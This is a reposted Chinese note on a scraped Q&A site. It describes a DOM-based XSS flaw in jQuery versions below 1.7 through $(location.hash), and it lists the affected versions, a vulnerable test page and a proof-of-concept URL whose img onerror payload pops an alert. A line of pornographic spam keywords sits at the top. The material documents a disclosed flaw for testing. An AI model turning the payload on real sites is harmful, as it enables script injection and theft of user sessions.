日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

jquery下载地址:https://code.jquery.com/jquery/ 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCA

發布時間:2023/11/30 编程问答 31 豆豆

jquery下載地址:https://code.jquery.com/jquery/


影響范圍:

????版本低于1.7的jQuery過濾用戶輸入數據所使用的正則表達式存在缺陷,可能導致LOCATION.HASH跨站漏洞

已測試成功版本:

????jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js

????jquery-1.5所有版本

????jquery-1.4所有版本

????jquery-1.3所有版本

????jquery-1.2所有版本

測試:

啟動nginx,并建立index.html頁面,內容如下:

漏洞發現者給的測試代碼:

<html>

<head>

????<title>JQuery-xss-test</title>

????<script src="https://code.jquery.com/jquery-1.6.1.min.js"></script>

????<script>

????$(function(){

????try { $(location.hash) } catch(e) {}

????})

????</script>

</head>

<body>

????Jquery xss test.

</body>

</html>

訪問地址:

http://localhost/#<img src=/ οnerrοr=alert(/F4ckTeam/)>

測試截圖:



創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的jquery下载地址:https://code.jquery.com/jquery/ 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCA的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。